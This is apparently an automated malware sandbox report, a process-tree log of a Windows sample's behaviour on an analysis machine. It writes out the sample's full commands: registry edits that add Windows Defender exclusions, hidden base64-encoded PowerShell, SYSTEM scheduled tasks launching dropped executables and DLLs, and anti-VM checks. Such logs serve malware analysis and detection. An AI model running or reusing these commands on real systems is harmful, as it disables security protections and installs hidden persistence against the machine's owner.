- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5692
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GGkIPDNvPhOAuwTEsUR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GGkIPDNvPhOAuwTEsUR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IFfyxFxqzCUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IFfyxFxqzCUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RmqlacUQU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RmqlacUQU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XYcGyWaqnbhU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XYcGyWaqnbhU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qioMUrUoKCErC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qioMUrUoKCErC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\ERCUCymjGgNKOwVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\ERCUCymjGgNKOwVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\bwQFAaCxmrWDaWaAS\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\bwQFAaCxmrWDaWaAS\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\OIWUzfnoSeVAWsLl\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\OIWUzfnoSeVAWsLl\" /t REG_DWORD /d 0 /reg:64;"
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:3768
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GGkIPDNvPhOAuwTEsUR" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5868
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GGkIPDNvPhOAuwTEsUR" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:5912
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GGkIPDNvPhOAuwTEsUR" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:6104
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IFfyxFxqzCUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5012
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IFfyxFxqzCUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5588
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RmqlacUQU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3560
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RmqlacUQU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1012
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XYcGyWaqnbhU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2492
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XYcGyWaqnbhU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4916
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qioMUrUoKCErC" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:700
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qioMUrUoKCErC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5192
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\ERCUCymjGgNKOwVB /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2472
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\ERCUCymjGgNKOwVB /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2496
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5436
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5804
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\bwQFAaCxmrWDaWaAS /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5536
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\bwQFAaCxmrWDaWaAS /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5548
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\OIWUzfnoSeVAWsLl /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5564
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\OIWUzfnoSeVAWsLl /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5568
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gdddBQgXf" /SC once /ST 00:12:57 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:5632
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gdddBQgXf"
  2⤵
  PID:3240
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5032
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gdddBQgXf"
  2⤵
  PID:5136
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "LOHPKuWKJcOzSYPZu" /SC once /ST 00:51:04 /RU "SYSTEM" /TR "\"C:\Windows\Temp\OIWUzfnoSeVAWsLl\bLTYzkLUOZBMYfc\LvCpfrq.exe\" mM /dMaKdidhV 385132 /S" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Scheduled Task/Job: Scheduled Task
  PID:5800
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "LOHPKuWKJcOzSYPZu"
  2⤵
  PID:5280
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 2180 -s 784
  2⤵
  - Program crash
  PID:4344

C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5732

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Command and Scripting Interpreter: PowerShell
PID:5180
- C:\Windows\system32\gpupdate.exe
  "C:\Windows\system32\gpupdate.exe" /force
  2⤵
  PID:5148

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:5728

\??\c:\windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:6088

C:\Windows\Temp\OIWUzfnoSeVAWsLl\bLTYzkLUOZBMYfc\LvCpfrq.exe
C:\Windows\Temp\OIWUzfnoSeVAWsLl\bLTYzkLUOZBMYfc\LvCpfrq.exe mM /dMaKdidhV 385132 /S
1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:5612
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "beIeSqxTUIgkrqSZzo"
  2⤵
  PID:2940
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
  2⤵
  PID:4464
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2336
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
    3⤵
    PID:1564
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
      4⤵
      PID:1480
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:5156
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        6⤵
        
        PID:2496
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\RmqlacUQU\IMLMRF.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ayCOowYLgjutNKI" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Scheduled Task/Job: Scheduled Task
  PID:2508
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "ayCOowYLgjutNKI2" /F /xml "C:\Program Files (x86)\RmqlacUQU\IWzpCVY.xml" /RU "SYSTEM"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:1948
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "ayCOowYLgjutNKI"
  2⤵
  PID:4924
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "ayCOowYLgjutNKI"
  2⤵
  PID:6040
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "AvuuMZnAgveLTP" /F /xml "C:\Program Files (x86)\XYcGyWaqnbhU2\cgkxsgt.xml" /RU "SYSTEM"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:6072
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "wHxxZovhMVeXN2" /F /xml "C:\ProgramData\ERCUCymjGgNKOwVB\tHRgycl.xml" /RU "SYSTEM"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:5896
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "YEzBJjbnitNtrmmkX2" /F /xml "C:\Program Files (x86)\GGkIPDNvPhOAuwTEsUR\FVqkoxN.xml" /RU "SYSTEM"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:6032
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "XgFMMTvgqSOFYnnQAbZ2" /F /xml "C:\Program Files (x86)\qioMUrUoKCErC\BECAWIJ.xml" /RU "SYSTEM"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:5872
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "ZNzITvxeQRflwsDJD" /SC once /ST 00:39:24 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\OIWUzfnoSeVAWsLl\JjMKuVoG\LqZeeWm.dll\",#1 /xMLdidgb 385132" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Scheduled Task/Job: Scheduled Task
  PID:5964
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "ZNzITvxeQRflwsDJD"
  2⤵
  PID:1768
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "Aotfx1" /SC once /ST 00:42:32 /F /RU "Admin" /TR "\"C:\Program Files\Mozilla Firefox\firefox.exe\""
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:648
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "Aotfx1"
  2⤵
  PID:1012
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "Aotfx1"
  2⤵
  PID:5264
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "LOHPKuWKJcOzSYPZu"
  2⤵
  PID:5744
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 5612 -s 2060
  2⤵
  - Program crash
  PID:1260

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Command and Scripting Interpreter: PowerShell
PID:2492
- C:\Windows\system32\gpupdate.exe
  "C:\Windows\system32\gpupdate.exe" /force
  2⤵
  PID:6136

\??\c:\windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1428

C:\Windows\Temp\bpNowFaEeWbSfYmu\mevTngXuZkHKOTD\lUAENHe.exe
C:\Windows\Temp\bpNowFaEeWbSfYmu\mevTngXuZkHKOTD\lUAENHe.exe MC /tKtydidvT 525403 /S
1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:5424
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "bIOEZkRAagKtMyjtNl"
  2⤵
  PID:5748
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
  2⤵
  PID:2488
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
    3⤵
    PID:5480
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
      4⤵
      PID:1932
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:1252
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        6⤵
        
        PID:5196
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\nXmjFVOHU\mPYhQC.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "JHXYugTugXnbcjp" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Scheduled Task/Job: Scheduled Task
  PID:4700
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "JHXYugTugXnbcjp2" /F /xml "C:\Program Files (x86)\nXmjFVOHU\bjSCtNc.xml" /RU "SYSTEM"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:5288
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "JHXYugTugXnbcjp"
  2⤵
  PID:4724
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "JHXYugTugXnbcjp"
  2⤵
  PID:2608
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "LfFBsRWwzAIUSz" /F /xml "C:\Program Files (x86)\ANKVsfPAuVEU2\fRIqltT.xml" /RU "SYSTEM"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:5708
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "ybYNGucztUodC2" /F /xml "C:\ProgramData\hVWjTjnIaijqmUVB\CNtAopt.xml" /RU "SYSTEM"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:4984
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "XPcedSoTrgNFjKDYa2" /F /xml "C:\Program Files (x86)\HfWdCszlsWLFcdllTSR\XUmgQoB.xml" /RU "SYSTEM"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:5320
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "tFGbXHHzrJEaMkVZkYf2" /F /xml "C:\Program Files (x86)\tuyZfYaPCcjxC\yPCSuhq.xml" /RU "SYSTEM"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:6092
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gYlDO1" /SC once /ST 00:03:43 /F /RU "Admin" /TR "\"C:\Program Files\Mozilla Firefox\firefox.exe\""
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:2852
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gYlDO1"
  2⤵
  PID:4432
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gYlDO1"
  2⤵
  PID:3296
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "fxxmGIjnSbKlnnNZc"
  2⤵
  PID:1956
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 5424 -s 1808
  2⤵
  - Program crash
  PID:3200

\??\c:\windows\system32\rundll32.EXE
c:\windows\system32\rundll32.EXE "C:\Windows\Temp\OIWUzfnoSeVAWsLl\JjMKuVoG\LqZeeWm.dll",#1 /xMLdidgb 385132
1⤵
PID:2556
- C:\Windows\SysWOW64\rundll32.exe
  c:\windows\system32\rundll32.EXE "C:\Windows\Temp\OIWUzfnoSeVAWsLl\JjMKuVoG\LqZeeWm.dll",#1 /xMLdidgb 385132
  2⤵
  - Blocklisted process makes network request
  - Checks BIOS information in registry
  - Loads dropped DLL
  - Drops file in System32 directory
  - Enumerates system info in registry
  - Modifies data under HKEY_USERS
  PID:5344
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "ZNzITvxeQRflwsDJD"
    3⤵
    PID:5724

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:5280
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx
  PID:504
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="504.0.487454093\1245285095" -parentBuildID 20221007134813 -prefsHandle 1628 -prefMapHandle 1620 -prefsLen 21872 -prefMapSize 234008 -appDir "C:\Program Files\Mozilla Firefox\browser" - {819c6359-8afa-465f-8106-bf12b27a017b} 504 "\\.\pipe\gecko-crash-server-pipe.504" 1760 212413ee858 gpu
    3⤵
    PID:4672
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="504.1.1728741760\1219475003" -parentBuildID 20221007134813 -prefsHandle 2088 -prefMapHandle 2084 -prefsLen 21953 -prefMapSize 234008 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3f196769-fdcd-41bf-8774-d2f1aa24c843} 504 "\\.\pipe\gecko-crash-server-pipe.504" 2100 21235a6eb58 socket
    3⤵
    PID:1372
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="504.2.332990283\1314161928" -childID 1 -isForBrowser -prefsHandle 1432 -prefMapHandle 2544 -prefsLen 22056 -prefMapSize 234008 -jsInitHandle 1000 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {af186a85-78ae-4630-a485-8a5fb65ee67f} 504 "\\.\pipe\gecko-crash-server-pipe.504" 2868 212459e1258 tab
    3⤵
    PID:2448
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="504.3.1731417056\898092014" -childID 2 -isForBrowser -prefsHandle 3312 -prefMapHandle 3308 -prefsLen 26350 -prefMapSize 234008 -jsInitHandle 1000 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4ac136f5-ceaf-4387-b30d-cb25d21e5197} 504 "\\.\pipe\gecko-crash-server-pipe.504" 3316 21235a5ee58 tab
    3⤵
    PID:5760

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:5008
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx
  PID:5088
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5088.0.1991021611\1534644301" -parentBuildID 20221007134813 -prefsHandle 1656 -prefMapHandle 1644 -prefsLen 21904 -prefMapSize 234060 -appDir "C:\Program Files\Mozilla Firefox\browser" - {237bfa83-f105-46b1-95e5-f4df94d357bb} 5088 "\\.\pipe\gecko-crash-server-pipe.5088" 1748 261bcb4d858 gpu
    3⤵
    PID:5908
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5088.1.1335998043\1279622653" -parentBuildID 20221007134813 -prefsHandle 2092 -prefMapHandle 2088 -prefsLen 21985 -prefMapSize 234060 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a10a859b-d3b1-4bb9-a71e-709c4a8605b8} 5088 "\\.\pipe\gecko-crash-server-pipe.5088" 2104 261bbad2258 socket
    3⤵
    - Checks processor information in registry
    PID:5844
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5088.2.1249260332\261055199" -childID 1 -isForBrowser -prefsHandle 2732 -prefMapHandle 2724 -prefsLen 22088 -prefMapSize 234060 -jsInitHandle 1268 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {07100e1b-9c4d-4e64-94fd-56a450f5e300} 5088 "\\.\pipe\gecko-crash-server-pipe.5088" 2784 261c1191458 tab
    3⤵
    PID:5164
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5088.3.1637461562\1067336579" -childID 2 -isForBrowser -prefsHandle 3440 -prefMapHandle 3436 -prefsLen 26430 -prefMapSize 234060 -jsInitHandle 1268 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6695ba8c-c8bb-437f-8171-4ee7636e080c} 5088 "\\.\pipe\gecko-crash-server-pipe.5088" 3444 261c2212558 tab
    3⤵
    PID:6104
- - C:\Program Files\Mozilla Firefox\firefox.exe
